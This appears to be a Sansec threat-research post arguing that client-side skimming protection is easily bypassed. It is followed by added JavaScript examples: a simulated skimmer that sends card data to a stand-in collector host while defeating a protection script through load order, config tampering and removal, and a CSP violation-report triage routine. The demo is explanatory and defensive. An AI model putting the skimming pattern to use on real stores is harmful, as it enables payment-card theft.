Sorry, client-side security does not work
by Sansec Forensics Team
Published in Threat Research − February 03, 2025
Browser-based protection can easily be bypassed by the majority of digital skimming attacks.
Merchants spend millions of dollars on client-side security solutions to prevent digital skimming attacks. Companies are rushing to implement these tools, often driven by PCI DSS v4.0 requirements 6.4.3 and 11.6.1 (an inventory of payment page scripts, and change and tamper detection for payment pages). But here's the reality: these solutions are ineffective against most attacks.
Fact: client-side solutions target symptoms, not the real problem
When malicious code appears on your site, it means your infrastructure has already been compromised. While client-side protection might neutralize malicious frontend code, it does nothing to stop attackers from getting into your system in the first place. Once attackers breach your server, they gain control of:
- Your entire database, including customer and order data
- All server-side code and business logic
- Access to internal systems and networks
- The ability to modify any code or content
You want to prevent thieves from getting into your systems, not merely block one of their escape routes.
Fact: client-side security can be easily side-stepped
Client-side security tools are loaded by a script tag that your own server emits, and they read their configuration from that same server. This creates a fundamental weakness: when attackers control your server, they can simply:
- Remove the security script entirely
- Modify its configuration to allow malicious code
- Insert their skimming code before the security solution loads, so the skimmer runs before any of its hooks are in place
Real protection needs to run independent of the thing it is protecting.
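The three bypasses above, as an added example that is not Sansec's code or any vendor's: a simulated page in which a minimal, hypothetical protection script wraps the browser's fetch and allowlists hosts from a server-emitted config object. The window object, the config name `__protectionConfig`, and all host names are assumptions made for the demo; the point is the trust root, not the specific product.

```javascript
// Added example, not code from Sansec or from any vendor: a simulated page
// showing why a protection script served by the compromised server cannot
// defend itself. "win" stands in for the browser window; the protection
// script, its config object and the host names are all hypothetical.

// The outside world: every request that actually leaves the browser lands here.
const outbound = [];
function networkSend(url, body) {
  outbound.push({ url, body });
  return 'sent';
}

// A minimal client-side protection script. It wraps win.fetch and only lets
// requests through to hosts listed in a config object the server emits.
function installProtection(win) {
  const original = win.fetch;
  win.fetch = function guardedFetch(url, body) {
    const host = new URL(url).host;
    if (!win.__protectionConfig.allowedHosts.includes(host)) return 'blocked';
    return original(url, body);
  };
}

// A skimmer posts the card form to the attacker's collector. Note that it
// grabs whatever win.fetch is at the moment the skimmer itself loads.
function installSkimmer(win, exfilUrl) {
  const fetchAtLoadTime = win.fetch;
  win.skim = function skim(card) {
    return fetchAtLoadTime(exfilUrl, JSON.stringify(card));
  };
}

function newWindow() {
  return {
    fetch: networkSend,
    __protectionConfig: { allowedHosts: ['shop.example', 'psp.example'] },
  };
}

const CARD = { pan: '4111111111111111', exp: '12/29', cvv: '123' }; // constructed
const EXFIL = 'https://collector.attacker.example/c';

// A: the vendor demo. Protection is in place before any injected code runs.
function scenarioProtectionFirst() {
  const win = newWindow();
  installProtection(win);
  installSkimmer(win, EXFIL);
  return win.skim(CARD);
}

// B: the attacker edits the server template and places the skimmer before the
// protection script tag. The skimmer captured the unwrapped fetch.
function scenarioSkimmerFirst() {
  const win = newWindow();
  installSkimmer(win, EXFIL);
  installProtection(win);
  return win.skim(CARD);
}

// C: load order is correct, but the server-emitted config now allowlists the
// collector host.
function scenarioConfigTampered() {
  const win = newWindow();
  win.__protectionConfig.allowedHosts.push('collector.attacker.example');
  installProtection(win);
  installSkimmer(win, EXFIL);
  return win.skim(CARD);
}

// D: the protection script tag was simply deleted from the template.
function scenarioProtectionRemoved() {
  const win = newWindow();
  installSkimmer(win, EXFIL);
  return win.skim(CARD);
}

function runScenarios() {
  outbound.length = 0;
  const results = {
    protectionFirst: scenarioProtectionFirst(),
    skimmerFirst: scenarioSkimmerFirst(),
    configTampered: scenarioConfigTampered(),
    protectionRemoved: scenarioProtectionRemoved(),
  };
  results.cardsExfiltrated = outbound.length;
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(runScenarios());
}
```

Only scenario A, the order a vendor demo uses, ends in 'blocked'; the other three exfiltrate the card. Nothing in the protection script is wrong as such. It simply runs inside a page the attacker already controls, and every one of its inputs (load order, configuration, its own presence) comes from the server the attacker owns.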
The Supply Chain Distraction
Vendors of client-side security know about these fundamental flaws, so they focus their marketing on a particular subset of the malware problem where their solutions could actually make sense: supply chain attacks.
While these attacks sound frightening in vendor presentations, the data tells a different story: the last successful supply chain attack that actually hit stores occurred in 2019. So vendors are selling a solution to a theoretical problem.
What does happen in reality? Plain old server hacks. At Sansec, we've been monitoring digital skimming attacks globally. In the last five years, we detected payment skimmers in over 210,000 online stores. Zero (0) of them were injected via JavaScript supply chain attacks*. The data is unambiguous: attackers inject practically all skimmers through direct server compromises, not through third-party services. This isn't speculation - it's based on years of real-world attack data.
* In fact, Sansec discovered a supply chain attack in 2022 that actually hit stores; however, that attack used (server-side) PHP code and could not have been detected or prevented by a client-side solution.
What Should You Do Instead?
The data is clear: to effectively protect against digital skimming, you need to secure your servers first. This means:
- Monitor for malware and vulnerabilities at the server level: changed or added files in the web root, PHP appearing in directories that should only hold media or cache, and installed extensions with known vulnerabilities
- Implement effective and timely patch procedures
- Run a free CSP monitor for compliance: a Content-Security-Policy header in report-only mode plus an endpoint that collects the violation reports, so a script or beacon to an unexpected origin on your payment pages is flagged
And are you still considering a client-side solution? Ask potential vendors these questions:
- What do you do to prevent my store getting hacked?
- Why didn't you discover the rogue Polyfill domain (polyfill.io, June 2024)?
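The CSP monitor recommended above and the Polyfill question go together, so here is one added example covering both (not Sansec's code, and not Sansec Watch): a report-only Content-Security-Policy for the checkout pages and a triage routine for the violation reports the browser posts back. The host names, the `/csp-report` path and the sample reports are constructed; the `csp-report` JSON shape is the one browsers send to a `report-uri` endpoint. One of the sample reports shows what a script tag pointing at cdn.polyfill.io would have looked like in such a feed.

```javascript
// Added example, not code from Sansec or from any CSP product: a report-only
// Content-Security-Policy for checkout pages and a triage routine for the
// violation reports browsers post back. Host names, the report path and the
// sample reports are constructed for the demo.
const REPORT_PATH = '/csp-report';
const ALLOWED_SCRIPT_HOSTS = ['shop.example', 'psp.example'];

// Response header to add on payment pages. Report-only means nothing is
// blocked yet; every script or connection outside the policy is reported.
function buildReportOnlyHeader(allowedHosts, reportPath) {
  const hosts = allowedHosts.map((h) => `https://${h}`).join(' ');
  return {
    'Content-Security-Policy-Report-Only':
      `default-src 'self'; script-src 'self' ${hosts}; ` +
      `connect-src 'self' ${hosts}; report-uri ${reportPath}`,
  };
}

// Parse one posted report body (content-type application/csp-report).
// Returns null for malformed input instead of throwing: the endpoint is
// reachable by anyone on the internet.
function parseReport(bodyJson) {
  let r;
  try { r = JSON.parse(bodyJson)['csp-report']; } catch (_) { return null; }
  if (!r || typeof r !== 'object') return null;
  const blocked = String(r['blocked-uri'] || '');
  const directive = String(r['effective-directive'] || r['violated-directive'] || '').split(' ')[0];
  let host = blocked;
  try { host = new URL(blocked).host; } catch (_) { /* 'inline', 'eval' stay as-is */ }
  // Browser extensions and (until the policy uses nonces) inline scripts
  // produce constant background noise; keep them out of the alert list.
  const scheme = blocked.split(':')[0];
  const noise = blocked === 'inline' || blocked === 'eval' || scheme.endsWith('-extension');
  return { host, directive, page: String(r['document-uri'] || ''), noise };
}

// Group the remaining reports by host so one rogue script shows up as one
// finding with a count, the directives it tripped and the pages it was on.
function triage(bodies) {
  const byHost = new Map();
  for (const body of bodies) {
    const p = parseReport(body);
    if (!p || p.noise || !p.host) continue;
    const e = byHost.get(p.host) || { host: p.host, count: 0, directives: new Set(), pages: new Set() };
    e.count += 1;
    e.directives.add(p.directive);
    e.pages.add(p.page);
    byHost.set(p.host, e);
  }
  return [...byHost.values()]
    .map((e) => ({ host: e.host, count: e.count, directives: [...e.directives].sort(), pages: [...e.pages].sort() }))
    .sort((a, b) => b.count - a.count || a.host.localeCompare(b.host));
}

const report = (page, directive, blocked) => JSON.stringify({
  'csp-report': { 'document-uri': page, 'effective-directive': directive, 'violated-directive': directive, 'blocked-uri': blocked },
});

// Constructed sample reports: two pages pulling a script from the polyfill
// domain, one beacon to a hypothetical collector host, plus typical noise and
// one junk post to the endpoint.
const SAMPLE_REPORTS = [
  report('https://shop.example/checkout', 'script-src-elem', 'https://cdn.polyfill.io/v3/polyfill.min.js'),
  report('https://shop.example/checkout/payment', 'script-src-elem', 'https://cdn.polyfill.io/v3/polyfill.min.js'),
  report('https://shop.example/checkout/payment', 'connect-src', 'https://collector.attacker.example/c'),
  report('https://shop.example/checkout', 'script-src-elem', 'chrome-extension://abcdefghijklmnop/inject.js'),
  report('https://shop.example/checkout', 'script-src-elem', 'inline'),
  'not json at all',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildReportOnlyHeader(ALLOWED_SCRIPT_HOSTS, REPORT_PATH));
  console.log(JSON.stringify(triage(SAMPLE_REPORTS), null, 2));
}
```

Two caveats a practitioner should keep in mind. First, `report-uri` is the older mechanism; newer browsers also support `report-to`, and sending both is harmless. Second, the header is emitted by the same server the attacker may control, so the report endpoint must live off the store host and something outside the host should periodically confirm the header is still being served, for the same reason the page gives for script tags.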
Don't waste resources on expensive solutions that attackers easily bypass. Focus on where the real attacks happen.